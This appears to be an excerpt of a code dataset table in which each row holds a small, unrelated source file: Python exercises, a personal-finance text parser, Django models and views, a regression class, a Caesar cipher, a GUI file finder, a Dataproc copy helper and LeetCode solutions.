index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
12,700 | 160c8da1a3830f5850a0cc5e3bb3eb3007bfb9a8 | #
# Exemplo de como criar classes
#
class minhaClasse():
    """Example of how to create classes.

    Inherited classes go between the parentheses. The constructor is
    __init__(self); every method receives the instance (self), which
    Python passes along automatically for each instantiated object.
    """

    def __init__(self):
        # Set in the constructor, so every instance starts with it.
        self.meuAtributo = "Passou pelo construtor!"

    def meuMetodo(self):
        """Method with no extra parameters; just reports that it ran."""
        print("Passou pelo meuMetodo")

    def meuMetodo2(self, valor):
        """Store *valor* on the instance and echo it.

        Methods can receive additional parameters, such as *valor* here.
        """
        self.outroAtributo = valor
        print(self.outroAtributo)
|
12,701 | ecdb5a5c819611868fc90b42225aae0ab3d48fe3 | import sys
from Fund import Fund
from TAA import TAA
# Fund list path from the command line (Swedish: "Fonlista som argument"),
# falling back to an interactive prompt.
if len(sys.argv) > 1:
    fundListPath = str(sys.argv[1])
else:
    fundListPath = input("Enter path to fundlist: ")
with open(fundListPath, 'r') as handle:
    fundList = []
    print("Fetching data", end='', flush=True)
    for line in handle:
        # Skip blank lines and '#' comment lines in the fund list.
        if line == '\n' or line.startswith('#'):
            continue
        # Line format: "<id> <name, possibly with spaces>"
        parts = line.split()
        id = parts[0]
        name = " ".join(parts[1:])
        fundList.append(Fund(id, name))
        print('.', end='', flush=True)  # one progress dot per fund loaded
    # Best average returns first.
    fundList = sorted(
        fundList, key=lambda fund: fund.getAverageReturns(), reverse=True)
    print("\n\n" + Fund.getFormattedHeader())
    for fund in fundList:
        print(fund.getFormattedData())
    print()
    # Tactical-allocation signal: compare the current US unemployment rate
    # with its 12-month moving average.
    unRateData = TAA.getUnRateData()
    print("\n\n=== US Unemployment rate ===")
    print("Current: " + str(unRateData[0]))
    print("MA12: " + str('{:.3f}'.format(unRateData[1])))
    if unRateData[0] < unRateData[1]:
        print("OK: unrate level is below MA12.\n")
    else:
        print("WARNING: unrate level is over MA12!\n")
    print("Done\n")
|
12,702 | b6154c2cf463da0d511f2928af25d6df97f96199 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import datetime
from functools import total_ordering
import logging
import io
import sys
import csv
import tempfile
import pandas as pd
from dateutil import rrule
from dateutil.relativedelta import relativedelta
# Default on-disk copy of money.txt (Dropbox app folder under $HOME).
DEFAULT_MONEY_TXT_PATH = os.path.join(os.path.expanduser("~"),
                                      "Dropbox/Apps/money.txt-dev/money.txt")
# Environment overrides: an explicit file path, or a Dropbox API token.
MONEY_TXT_PATH_ENV = "MONEY_TXT_PATH"
DROPBOX_TOKEN_ENV = "MONEY_TXT_DROPBOX_TOKEN"
def get_total(df):
    """Get total current value.

    Sums the `value` column from the most recent milestone row (any row
    whose `cmd` is set) through the end of the frame.

    Args:
        df: Data frame with all records, including milestones.
    Returns:
        float total current value.
    """
    # Fix: Index.get_values() was removed in pandas 1.0; taking the last
    # label of the filtered index yields the same milestone id.
    last_milestone_id = df[df.cmd.notnull()].index[-1]
    total = df[last_milestone_id:].value.sum()
    return total
@total_ordering
class Entry:
    """One parsed line of money.txt: a record, a '!command', or empty.

    Attributes set by parsing:
        cats  - tuple of category names from the description field.
        tags  - '#tag' words from the trailing note, without the '#'.
        day   - datetime.date of the entry (falls back to the `date` arg).
        value - signed amount; a leading '+' marks income, otherwise the
                amount is stored negated (an expense).
        note  - free-text note with the tag words stripped out.
        cmd   - command name for '!' lines, else None.
    """

    def __init__(self, s=None, date=None):
        self.cats = []
        self.tags = []
        self.day = None
        self.value = 0
        self.note = ""
        self.cmd = None
        if s is None:
            return
        if s.strip() == "":
            return
        elif s.strip()[0] == '#':
            # Comment line: keep the empty defaults (is_empty() -> True).
            return
        # '!command' lines: optional YYYY.MM.DD date, command, arithmetic value.
        cmd_re = re.compile(r'\s*(\d\d\d\d\.\d\d\.\d\d)?\s+!(.*?) +([\(\)\d\+-\.\*,]+)\s*')
        # Regular lines: optional date, categories, value, free-form note.
        entry_re = re.compile(r' *(\d\d\d\d\.\d\d\.\d\d)? *(.*?) +([\(\)\d\+-\.,\*]+)\w*(.*)')
        cmd_match = cmd_re.match(s)
        if cmd_match is not None:
            date_str, self.cmd, value_str = cmd_match.groups()
            self.day = datetime.date(*map(int, date_str.split('.')))
            # NOTE(review): eval() supports arithmetic like "3*4+1" in the
            # value field but executes arbitrary input — trusted file only.
            self.value = eval(value_str)
        else:
            try:
                date_gr, desc_gr, value_gr, note_gr = entry_re.match(s).groups()
            except AttributeError as e:
                # entry_re.match() returned None: report and skip the line.
                msg = str(e)
                print("Error line: {} ({})".format(s, e))
                return
            # Accept ',' as a decimal separator.
            value_gr = value_gr.replace(',', '.')
            note_words = list(filter(None, note_gr.split()))
            self.day = date if date_gr is None else datetime.date(*map(int, date_gr.split('.')))
            self.cats = tuple(filter(None, map(str.strip, desc_gr.split(','))))
            # '+' prefix means income; otherwise store the amount negated.
            self.value = eval(value_gr) if value_gr[0] == '+' else -eval(value_gr)
            self.note = ' '.join(filter(lambda x: x[0] != '#', note_words))
            self.tags = list(map(lambda x: x[1:], filter(lambda x: x[0] == '#', note_words)))

    def __str__(self):
        """Render back in (approximately) the input format."""
        if self.cmd is None:
            # Expenses are stored negative; show them unsigned, incomes with '+'.
            value_str = "{:.1f}".format(-self.value) if self.value < 0 else "+{:.0f}".format(self.value)
            return "{} {} {} {} {}".format(self.day, ','.join(self.cats), value_str,
                '' if self.note is None else self.note, ' '.join(map(lambda x: '#'+x, self.tags)))
        else:
            return "{} !{} {:.1f}".format(self.day, self.cmd, self.value)

    def __repr__(self):
        return '\n'+str(self.__dict__)

    def __eq__(self, other):
        # Full-field equality; total_ordering derives <=, >=, < from this
        # plus __gt__.
        return self.cats == other.cats and self.day == other.day and self.tags == other.tags \
            and self.value == other.value and self.note == other.note

    def __gt__(self, other):
        # Ordering is by date only (intentionally coarser than __eq__).
        return self.day > other.day

    def is_empty(self):
        # True for blank/comment/unparseable lines: no categories, no command.
        return len(self.cats) == 0 and self.cmd is None
def load_money_txt():
    """Read the raw money.txt text from the first available source.

    Priority: $MONEY_TXT_PATH file, then Dropbox (via token env var),
    then the default Dropbox-folder path; raises RuntimeError otherwise.
    """
    path_override = os.environ.get(MONEY_TXT_PATH_ENV)
    if path_override is not None:
        with open(path_override) as handle:
            return handle.read()
    token = os.environ.get(DROPBOX_TOKEN_ENV)
    if token is not None:
        import dropbox_stuff
        text = dropbox_stuff.get_money_txt(token)
        if text is None:
            print('Can not load money.txt from Dropbox')
        return text
    if os.path.exists(DEFAULT_MONEY_TXT_PATH):
        with open(DEFAULT_MONEY_TXT_PATH) as handle:
            return handle.read()
    raise RuntimeError(
        "Can not find any of environmental variables: {}. "
        "And there is no file at default path {}".format(
            ', '.join([MONEY_TXT_PATH_ENV, DROPBOX_TOKEN_ENV]),
            DEFAULT_MONEY_TXT_PATH))
def save_money_txt(data):
    """Write money.txt back to the same source load_money_txt() reads from."""
    path_override = os.environ.get(MONEY_TXT_PATH_ENV)
    if path_override is not None:
        with open(path_override, "w") as handle:
            handle.write(data)
        return
    token = os.environ.get(DROPBOX_TOKEN_ENV)
    if token is not None:
        import dropbox_stuff
        dropbox_stuff.set_money_txt(token, data)
        return
    if os.path.exists(DEFAULT_MONEY_TXT_PATH):
        with open(DEFAULT_MONEY_TXT_PATH, "w") as handle:
            handle.write(data)
        return
    raise RuntimeError(
        "Can not find any of environmental variables: {}. "
        "And there is no file at default path {}".format(
            ', '.join([MONEY_TXT_PATH_ENV, DROPBOX_TOKEN_ENV]),
            DEFAULT_MONEY_TXT_PATH))
def load_money_txt_lines():
    """Return the non-empty lines of money.txt after the "START" marker.

    Fix: when "START" was absent, the first find() returned -1 and the
    follow-up find("\\n", -1) searched only the final character, which
    silently discarded (almost) the whole file. A missing marker now
    keeps the full text.
    """
    text = load_money_txt()
    start_index = text.find("START")
    if start_index != -1:
        # Skip to the end of the marker line.
        start_index = text.find("\n", start_index)
    if start_index != -1:
        text = text[start_index:]
    return filter(None, text.splitlines())
def load_df():
    """Parse money.txt into a pandas DataFrame.

    Each non-empty Entry becomes a row with its date, command, value,
    up to three categories, and note; empty/comment lines are dropped.
    """
    logging.info("Started loading data frame")
    sep = ","

    def _csv_buffer():
        # Python 3 can stage the CSV in memory; Python 2 needs a temp file.
        if sys.version_info[0] > 2:
            return io.StringIO()
        return tempfile.TemporaryFile("w+")

    with _csv_buffer() as buf:
        writer = csv.writer(buf, delimiter=sep)
        writer.writerow(["date", "cmd", "value", "cat1", "cat2", "cat3", "note"])
        for line in load_money_txt_lines():
            entry = Entry(line)
            if entry.is_empty():
                continue
            # Pad the category tuple out to three columns.
            cats = list(entry.cats) + [None, None, None]
            writer.writerow([
                entry.day,
                entry.cmd,
                entry.value,
                cats[0],
                cats[1],
                cats[2],
                entry.note,
            ])
        buf.seek(0)
        return pd.read_csv(buf, sep=sep)
def split_monthly(period, first_day):
    """Break the [period[0], period[1]] span into month-long windows.

    Each window runs from an rrule monthly boundary to the day before the
    next one. NOTE(review): first_day is validated but never used — the
    windows always start on the rrule month boundary; confirm intent.
    """
    assert len(period) == 2
    assert 1 <= first_day <= 28
    month_starts = rrule.rrule(rrule.MONTHLY, dtstart=period[0],
                               until=period[1])
    windows = []
    for start in month_starts:
        window_start = start.date()
        window_end = window_start + relativedelta(months=1) - relativedelta(days=1)
        windows.append((window_start, window_end))
    return windows
def for_period(df, first_day, last_day):
    """Slice df down to entries dated between first_day and last_day.

    NOTE(review): adds a "lines_order" column to the caller's frame
    before the local reassignment — a visible side effect; confirm it
    is acceptable.
    """
    # Dates are compared as ISO "YYYY-MM-DD" strings, which sort correctly.
    first_day_str = first_day.strftime("%Y-%m-%d")
    last_day_str = last_day.strftime("%Y-%m-%d")
    # Stable tiebreaker: preserve original file order within one date.
    df["lines_order"] = df.index
    df = df.sort_values(["date", "lines_order"])
    before_first_day = df[df.date < first_day_str]
    if len(before_first_day) == 0:
        start_index = 0
    else:
        # NOTE(review): index *labels* (original row ids) are used as
        # slice bounds on the re-sorted frame; this assumes the integer
        # index still tracks chronological order — confirm.
        start_index = before_first_day.index[-1] + 1
    after_last_day = df[df.date > last_day_str]
    if len(after_last_day) == 0:
        finish_index = df.index[-1]
    else:
        finish_index = after_last_day.index[0] - 1
    return df[start_index:finish_index+1]
def by_cat1(df):
    """Sum every column per top-level category, ordered ascending by value."""
    totals = df.groupby("cat1").sum()
    return totals.sort_values(by="value")
|
12,703 | acedada367c6aeb6dc9b693a19b043a63b3d77e7 | from django.db import models
import caching.base
# Our apps should subclass ManagerBase instead of models.Manager or
# caching.base.CachingManager directly, so the caching backend can be
# swapped in one place.
ManagerBase = caching.base.CachingManager
class ModelBase(caching.base.CachingMixin, models.Model):
    """
    Base class for doozer models to abstract some common features.

    * Caching.
    """
    # Default manager: query results go through the caching layer.
    objects = ManagerBase()
    # Escape hatch that always hits the database directly.
    uncached = models.Manager()

    class Meta:
        abstract = True
class TimestampMixin(models.Model):
    """Mixin to add created and updated fields."""
    # Set once on insert; indexed for "newest first" queries.
    created = models.DateTimeField(db_index=True, auto_now_add=True)
    # Refreshed on every save().
    updated = models.DateTimeField(db_index=True, auto_now=True)

    class Meta(object):
        abstract = True
|
12,704 | f1a173b36500a7d67a74ca297d17dd796e4975b4 | from numpy import sqrt
import numpy as np
class Regression_lineaire:
    """Weighted least-squares fit of a straight line y = intercept + pente*x.

    Standard chi-square linear-regression formulas with per-point
    uncertainties dy; a scalar dy is broadcast to every point.
    """

    def __init__(self, x: np.array, y: np.array, dy=1):
        assert x.shape == y.shape
        self.x = x
        self.y = y
        # Broadcast a scalar uncertainty to one entry per data point.
        self.dy = dy if isinstance(dy, np.ndarray) else np.ones(x.shape[0]) * dy
        # Fix: use self.dy (always an ndarray). The original used the raw
        # dy argument here, so the scalar default dy=1 crashed on
        # (1 / dy**2).sum() — a plain float has no .sum().
        w = 1 / self.dy**2
        self._delta = w.sum() * (x**2 * w).sum() - ((x * w).sum())**2

    def pente(self):
        """Best-fit slope."""
        w = 1 / self.dy**2
        return (w.sum() * (self.x * self.y * w).sum()
                - (self.x * w).sum() * (self.y * w).sum()) / self._delta

    def sigma_pente(self):
        """One-sigma uncertainty on the slope."""
        return sqrt((1 / self.dy**2).sum() / self._delta)

    def intercept(self):
        """Best-fit intercept."""
        w = 1 / self.dy**2
        return ((self.x**2 * w).sum() * (self.y * w).sum()
                - (self.x * w).sum() * (self.x * self.y * w).sum()) / self._delta

    def sigma_intercept(self):
        """One-sigma uncertainty on the intercept."""
        return sqrt((self.x**2 / self.dy**2).sum() / self._delta)

    def y_hat(self, x):
        """Predicted y at *x* from the fitted line."""
        return self.pente() * x + self.intercept()

    def sigma_y_hat(self, x):
        """Propagated uncertainty on y_hat(x), including the covariance term."""
        return sqrt(self.sigma_intercept()**2 + (self.sigma_pente() * x)**2
                    + 2 * self.covariance_pente_intercept() * self.sigma_intercept() * (self.sigma_pente() * x))

    def R_squared(self):
        """
        This is the R^2 test, which measures how much of the variance in y
        is explained by the model. It runs from 1 to -1, both being good
        while 0 is very bad.
        """
        return 1 - ((self.y - self.y_hat(self.x))**2).sum() / ((self.y - self.y.mean())**2).sum()

    def pearson_r(self):
        """
        Standard correlation test between x and y. A value of 1 or -1 implies
        a linear model describes the data perfectly; 0 implies no correlation.

        NOTE(review): mixes the plain mean of x with the error-weighted
        average of y, and does not divide by N — confirm intent.
        """
        return ((self.x - self.x.mean()) * (self.y - self.error_weighted_average(self.y, self.dy))).sum() / self.x.std() / self.y.std()

    def chi_squared_reduced(self):
        """Reduced chi-square of the fit: chi^2 / (N - 2) degrees of freedom.

        Fix: the original referenced undefined globals (y, a, b, x, dy);
        it now uses the instance data and the fitted intercept/slope.
        """
        residuals = (self.y - self.intercept() - self.pente() * self.x) / self.dy
        return (residuals**2).sum() / (self.x.size - 2)

    def covariance_pente_intercept(self):
        """Covariance between the fitted slope and intercept."""
        return - 1 / ((1 / self.dy)**2).sum() * self.x.mean() / ((self.x**2).mean() - (self.x).mean()**2)

    @staticmethod
    def error_weighted_average(x, sigma_x):
        """Inverse-variance weighted average of *x*."""
        return (x / sigma_x**2).sum() / (1 / sigma_x**2).sum()
if __name__ == "__main__":
    # Small tests to make sure this class works well.
    # NOTE(review): dy is the *noise sample* reused as the per-point
    # uncertainty; it can be negative (squared everywhere, so harmless)
    # or near zero (weights blow up) — confirm this is intended.
    x = np.linspace(10, 50000, 200)
    dy = np.random.normal(0, 1.5, 200)
    y = np.linspace(10, 50000, 200) + dy
    rl = Regression_lineaire(x, y, dy)
    print("Pente: %.1f +/- %.1e" % (rl.pente(), rl.sigma_pente()))
    print("Intercept %.1f +/- %.1e" % (rl.intercept(), rl.sigma_intercept()))
    # With sigma-1.5 noise over a 10..50000 range, the fitted line should
    # be very close to y = x.
    assert rl.pente() >= 0
    assert abs(rl.pente() - 1) <= 0.1
    assert abs(rl.intercept()) <= 0.5, rl.intercept()
    assert rl.sigma_y_hat(5) <= 0.1, rl.sigma_y_hat(5)
    assert abs(rl.y_hat(5) - 5) <= 0.1
    assert rl.pearson_r() >= 0.9
    assert rl.R_squared() >= 0.9
|
12,705 | 73a0fe5400c9332e050f6b61ca22c18c5defa640 | #!/usr/bin/env python3
# -- coding utf-8 --
if __name__ == "__main__":
    # Write the file completely (and close it, flushing buffers) BEFORE
    # reading it back. The original opened both handles up front, so the
    # reader could see empty/unflushed content.
    strWrited = "Hello World.\n"
    print("write:" + strWrited, end = "")
    with open("e10.txt", "w") as fileOut:
        fileOut.write(strWrited)
        strWrited = "012345\n"
        print("write:" + strWrited)
        fileOut.write(strWrited)
    # Iterate the file object to get whole lines; the original looped over
    # readline()'s return value, which iterates *characters* of one line.
    with open("e10.txt", "r") as fileIn:
        for line in fileIn:
            print("read:" + line, end = "")
|
12,706 | 2b4854813ba48b7b1bd13ab62f32a5dd87a21fa2 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-18 11:14
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: point EffectsModel.effect uploads at a date-bucketed path."""

    dependencies = [
        ('api', '0002_effectsmodel'),
    ]

    operations = [
        migrations.AlterField(
            model_name='effectsmodel',
            name='effect',
            # NOTE: the bytes upload_to (b'...') is a Python-2 artifact of
            # the Django 1.9 generator; a str literal is conventional.
            field=models.FileField(upload_to=b'effects/%Y/%m/%d'),
        ),
    ]
|
12,707 | a30d7920c12d21218409534f16d0d6ed3f876fff | from karel.stanfordkarel import *
def main():
    """Langton's-ant-style walk: 10900 steps of flip-the-square-and-turn."""
    steps = 0
    while True:
        steps = steps + 1
        if beepers_present():
            # Black square: clear it, turn 90° left, advance one unit.
            pick_beeper()
            turn_left()
            move()
        else:
            # White square: mark it, turn 90° right, advance one unit.
            put_beeper()
            turn_right()
            move()
        if steps == 10900:
            break
def turn_right():
    """Three left turns make a right turn (Karel has no native right)."""
    turn_left()
    turn_left()
    turn_left()
if __name__ == "__main__":
    # Run main() in the 2x8 world file shipped with the assignment.
    run_karel_program('2x8.w')
|
12,708 | ea49bc30c141a2b749a0ba319d2bdcc642f801b8 | # -*- coding: iso-8859-15 -*-
from flask import Flask
import pyodbc
# Flask app wired to an ODBC database; the DB connection is opened at
# import time, and views register themselves on the app when imported.
app = Flask(__name__)
app.config.from_pyfile('config.py')
db = pyodbc.connect(app.config['DSN'])
from views import *
if __name__ == "__main__":
    #app.run(host='0.0.0.0', port=8080)
    app.run(debug=True)
|
12,709 | ef09bd322d26d5b84f1ea31dc19e508e27b576a6 |
# Queue simulation: each second, every boy ('B') standing directly in
# front of a girl ('G') swaps places with her. Read n, m and the queue,
# simulate m seconds, print the final arrangement.
n, m = map(int, input().split())
s = list(input()[:n])
while m > 0:
    j = 0
    while j < len(s) - 1:
        if s[j] == 'B' and s[j + 1] == 'G':
            s[j], s[j + 1] = s[j + 1], s[j]
            # Skip the girl who just moved left so the same 'B' is not
            # swapped twice in one second. The original's `j += 1` inside
            # a for-loop was a no-op (Python rebinds j each iteration).
            j += 2
        else:
            j += 1
    m -= 1
# Debug `print(s)` (list repr) removed; only the answer is printed.
print(''.join(s))
|
12,710 | ff1acbcda057aa435a72624424e385566c6e8167 | import PySimpleGUI as sg
from utils import find_all_subdirectories, find_files
import datetime
# Window layout: title, path picker row (read-only input + folder browse),
# filter-expression row, action row, and a scrolling output pane ('output').
layout = [
    [sg.Text('File Explorer - Find files/directories on your drive', font=("Arial", 20))],
    [sg.Text('Choose the path', font=("Arial", 14)), sg.InputText("", size=(40, 1), font=("Arial", 14), key='path',
                                                                  disabled=True, enable_events=True),
     sg.FolderBrowse(font=("Arial", 14))],
    [sg.Text('Enter a filter expression (for example: .jpg or .txt using wildcards)', font=("Arial", 14)),
     sg.InputText("", font=("Arial", 14), size=(10, 1), key='filter', enable_events=True)],
    [sg.Checkbox('Display Directories', font=("Arial", 14), key='directories'),
     sg.Button("Find...", font=("Arial", 14), bind_return_key=True, key='find'),
     sg.Button("Clear", font=("Arial", 14), bind_return_key=True, key='clear')],
    [sg.Output(font=("Arial", 14), size=(80, 15), key='output')]
]
def get_current_date():
    """Return the current local time formatted as 'YYYY-MM-DD HH:MM'."""
    return datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
def display_files_directories(path, filter_expr):
    """Print a DOS-dir-style listing of matching directories and files."""
    directories, files, stats = find_all_subdirectories(path, filter_expr)
    stamp = get_current_date()
    for directory in directories:
        print(stamp + "\t" + "<DIR>\t" + directory)
    for name, size in files.items():
        print(stamp + "\t" + "<FILE>\t" + name + "\t\t" + str(size) + " bytes")
    print()
    # Summary: counts, cumulative size, and remaining disk space.
    print(str(stats['total_files']) + " File(s)" + '\t' + str(stats['total_file_size']) + " bytes")
    print(str(stats['total_directories']) + " Dir(s)" + '\t' + str(stats['free_disk_space']) + " bytes free")
def display_files(path, filter_expr):
    """Print matching files under *path* plus summary totals.

    Fix: the summary printed e.g. "3File(s)" with no space before
    "File(s)"; it now matches display_files_directories' formatting.
    """
    date = get_current_date()
    files, stats = find_files(path, filter_expr)
    for file, size in files.items():
        print(date + "\t" + "<FILE>\t" + file + "\t\t" + str(size) + " bytes")
    print()
    print(str(stats['total_files']) + " File(s)" + '\t' + str(stats['total_file_size']) + " bytes")
    print(str(stats['free_disk_space']) + " bytes free")
def display_details(values):
    """Run a search with the current form values and refresh the output pane."""
    window['output'].Update('')  # clear any previous results first
    if values['directories']:
        display_files_directories(values['path'], values['filter'])
    else:
        display_files(values['path'], values['filter'])
if __name__ == '__main__':
    window = sg.Window('File Explorer', layout)
    # Event loop: dispatch button events until the window closes.
    while True:
        event, values = window.Read()
        if event == sg.WINDOW_CLOSED:
            break
        elif event == 'find':
            display_details(values)
        elif event == 'clear':
            window['output'].Update('')  # wipe the results pane
    window.Close()
|
12,711 | c318a78fdbe26b21499ca0d5aac77d68ebeb32f7 | from albumGrabberOOP import albumGetter
# Construct the grabber and start fetching albums right away.
instance = albumGetter()
instance.start()
12,712 | 4389879084e4ad90d71d59c59b9d8346ae79aaf7 | import os
import sys
from subprocess import Popen, check_call
def init_parser(parser):
    """Register the copy-tool CLI arguments on *parser*.

    One positional cluster name, optional --jar/--zip artifacts to push,
    and the Dataproc compute zone (-z/--zone).
    """
    parser.add_argument('name', type=str, help='Cluster name.')
    parser.add_argument('--jar', type=str, help='New JAR.')
    parser.add_argument('--zip', type=str, help='New ZIP.')
    parser.add_argument(
        '--zone', '-z', default='us-central1-b', type=str,
        help='Compute zone for Dataproc cluster (default: %(default)s).')
def main(args):
    """Push a new JAR and/or ZIP to the named Dataproc cluster master."""
    if args.jar is not None:
        _scp_and_sudo_move(args.jar, args.name, '/home/hail/hail.jar', args.zone)
    if args.zip is not None:
        _scp_and_sudo_move(args.zip, args.name, '/home/hail/hail.zip', args.zone)
# The user doesn't have write access to /home/hail/, so we stage the file
# and use sudo to move it into place.
def _scp_and_sudo_move(source, destination_host, destination, zone):
    """Copy *source* onto the cluster master and sudo-move it to *destination*.

    gs:// sources are pulled remotely with gsutil; local sources are
    scp'd to /tmp/foo first, then moved with sudo.
    """
    master = '{}-m'.format(destination_host)
    zone_flag = '--zone={}'.format(zone)
    if source.startswith("gs://"):
        remote_cmd = 'sudo gsutil cp {} {}'.format(source, destination)
        check_call(
            ['gcloud', 'compute', 'ssh', master, zone_flag, '--', remote_cmd],
            stdout=sys.stdout, stderr=sys.stderr)
    else:
        check_call(
            ['gcloud', 'compute', 'scp', zone_flag, source,
             '{}:/tmp/foo'.format(master)],
            stdout=sys.stdout, stderr=sys.stderr)
        check_call(
            ['gcloud', 'compute', 'ssh', master, zone_flag, '--',
             'sudo mv /tmp/foo {}'.format(destination)],
            stdout=sys.stdout, stderr=sys.stderr)
|
12,713 | 52200136624ddd0ce310a5da6f0767550357714b | class Solution:
def relativeSortArray(self, arr1: List[int], arr2: List[int]) -> List[int]:
retList = []
for i in arr2:
## 利用remove自动寻找值的特性,一直找到没空为止就跳出循环
while True:
try:
arr1.remove(i)
retList.append(i)
except:
break
retList += sorted(arr1)
return retList
if __name__ == '__main__':
    # Quick manual check against the LeetCode 1122 example.
    first = [2, 3, 1, 3, 2, 4, 6, 7, 9, 2, 19]
    order = [2, 1, 4, 3, 9, 6]
    print(Solution().relativeSortArray(first, order))
12,714 | a8ebe9dac46494f56d8499c851a91fe1e6bcba12 | from django.apps import AppConfig
class GestionmachinesConfig(AppConfig):
    """Django app configuration for the gestionMachines app."""
    name = 'gestionMachines'
|
12,715 | af9e00cb7754c7a05f15c8c2672b5555b86897a7 | class Solution:
def maximumNumberOfOnes(self, width: int, height: int, sideLength: int, maxOnes: int) -> int:
matrix1 = [[0 for _ in range(sideLength)] for _ in range(sideLength)]
for i in range(height):
for j in range(width):
matrix1[i%sideLength][j%sideLength] -= 1
heap = []
for i in range(sideLength):
for j in range(sideLength):
heap.append((matrix1[i][j], i, j))
heapq.heapify(heap)
matrix2 = [[0 for _ in range(sideLength)] for _ in range(sideLength)]
for _ in range(maxOnes):
_, i, j = heapq.heappop(heap)
matrix2[i][j] = 1
ans = 0
for i in range(height):
for j in range(width):
ans += matrix2[i % sideLength][j % sideLength] == 1
return ans |
12,716 | 2bb03149ab7de8b7a576dd7f20b248d2dc1e0c3c | print("How old are you?",end = ' ')
# Read the age (prompt printed on the previous line) and the name,
# then echo both back.
age = input()
name = input("What's your name? ")
print(f"Your name is {name}, your age is {age}.")
|
12,717 | 613f2b62b192a0ad34b481344ae5bb5647651673 | import string
class Cesar:
    """Caesar cipher over ASCII letters; other characters pass through."""

    def __init__(self, word, key):
        self.word = word  # text to encrypt
        self.key = key    # shift amount (any int; normalized mod 26 on use)

    def get_shifr(self):
        """Return *word* with every ASCII letter shifted by *key*.

        Fix: the original range check let an uppercase letter shifted
        past 'Z' land inside the lowercase ASCII band (e.g. 'Z' + 10 gave
        'd'); letters now wrap within their own case ('Z' + 10 -> 'J').
        """
        shifrword = ""
        self.key = self.key % 26  # kept: the original normalized in place
        for ch in self.word:
            if ch in string.ascii_lowercase:
                shifted = (ord(ch) - ord('a') + self.key) % 26 + ord('a')
            elif ch in string.ascii_uppercase:
                shifted = (ord(ch) - ord('A') + self.key) % 26 + ord('A')
            else:
                # Non-letters are copied unchanged.
                shifted = ord(ch)
            shifrword += chr(shifted)
        return shifrword
# Prompts are Ukrainian: "enter the word to encrypt" / "enter the key".
shifr = Cesar(input("Введіть слово яке потрібно зашифрувати>> "), int(input("Введіть ключ>> ")))
print(shifr.get_shifr())
|
12,718 | fa63c99853a90e8caa517269883cb4f119037e3b | from django.shortcuts import redirect
from django.views import View
class logout(View):
    """Session-clearing logout endpoint."""

    def get(self, request):
        # Wipe everything stored in the session, then bounce to login.
        request.session.clear()
        login_url = '/authen/login/'
        return redirect(login_url)
12,719 | 176a4b48fa34583cd8cd740486b23d11cc840f4c | from django.urls import reverse_lazy
from django.views.generic import CreateView, ListView, DetailView
from .models import Post
class PostCreateView(CreateView):
    """Form view for creating a Post; redirects to 'index' on success."""
    model = Post
    fields = ('title', 'content')
    success_url = reverse_lazy('index')
class PostListView(ListView):
    """Default list view over all Post objects."""
    model = Post
class PostDetailView(DetailView):
    """Default detail view for a single Post."""
    model = Post
|
12,720 | 0596ab37032b552533aeef5f5713ba67e37d3ed0 | import sys
'''Displays any image file that PIL can understand. Doesn't display
transparency well, so try showing that on a web browser.'''
try:
# This works on the Linux machines
from PIL import Image
except:
print "Couldn't import PIL.Image"
sys.exit()
def showimage(filename):
    """Open *filename* with PIL, log its format details, and display it."""
    img = Image.open(filename)
    # format_description/format/getbbox come straight from the PIL image.
    print "converting %s which is format %s (%s) and dimensions %s" % (
        filename,
        img.format_description,
        img.format,
        img.getbbox())
    img.show()
if __name__ == '__main__':
    # Usage: showimage.py <image-file>
    showimage(sys.argv[1])
|
12,721 | 5b229b01cca71c88c687d03c2a97a54746885deb | import sys
def decode(code, key):
    """Map each numeric token in *code* to the 1-indexed character of *key*."""
    return "".join(key[int(token) - 1] for token in code)
# Each input line is "<key>|<space-separated numeric codes>"; decode and print.
with open(sys.argv[1], 'r') as handle:
    for line in handle:
        if not line:
            continue
        fields = line.strip().split('|')
        key = fields[0]
        code = fields[1].strip().split(' ')
        print(decode(code, key))
12,722 | 204661714d8c151a1cc3a77f64837a715e1e74cd |
import time
from util.util_list import *
from util.util_tree import *
import copy
import collections
class Solution:
    def maximumWealth(self, accounts: [[int]]) -> int:
        """Return the richest customer's total wealth (largest row sum).

        The 0 seed mirrors the original accumulator, so an empty accounts
        list (or all-negative row sums) still yields 0.
        """
        return max([0, *map(sum, accounts)])
# Ad-hoc check against the LeetCode example, with a wall-clock timing line.
stime = time.time()
expected = 6
print(expected == Solution().maximumWealth([[1, 2, 3], [3, 2, 1]]))
print('elapse time: {} sec'.format(time.time() - stime))
12,723 | 6a086ee43581e230337032e2d6f2af2a3eda43cb | # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Code related to base functionality for making requests
"""
from typing import Any, List, Union
__all__ = ["BASE_API_URL", "ModelArgs"]

# Root endpoint for sparsezoo model requests.
BASE_API_URL = "https://api.neuralmagic.com/models"
class ModelArgs:
    """Descriptor bundle identifying a model in the sparsezoo.

    Each field maps onto one component of a sparsezoo stub path such as
    cv/classification/resnet_v1-50/pytorch/sparseml/imagenet/pruned-moderate.

    :param domain: model domain, e.g. cv, nlp
    :param sub_domain: model sub domain, e.g. classification, segmentation
    :param architecture: model architecture, e.g. resnet_v1, mobilenet_v1
    :param sub_architecture: sub architecture (scaling factor), e.g. 50, 101, 152
    :param framework: training framework, e.g. pytorch, tensorflow
    :param repo: source repo, e.g. sparseml, torchvision
    :param dataset: training dataset, e.g. imagenet, cifar10
    :param training_scheme: training scheme used, if any, e.g. augmented
    :param optim_name: optimization name, e.g. base, pruned, pruned_quant
    :param optim_category: degree of optimization, e.g. none, conservative
        (~100% baseline metric), moderate (>=99%), aggressive (<99%)
    :param optim_target: optimization deployment target, e.g. edge,
        deepsparse, deepsparse_throughput, gpu
    :param release_version: sparsezoo release version for the model
    """

    def __init__(
        self,
        domain: Union[str, None] = None,
        sub_domain: Union[str, None] = None,
        architecture: Union[str, List[str], None] = None,
        sub_architecture: Union[str, List[str], None] = None,
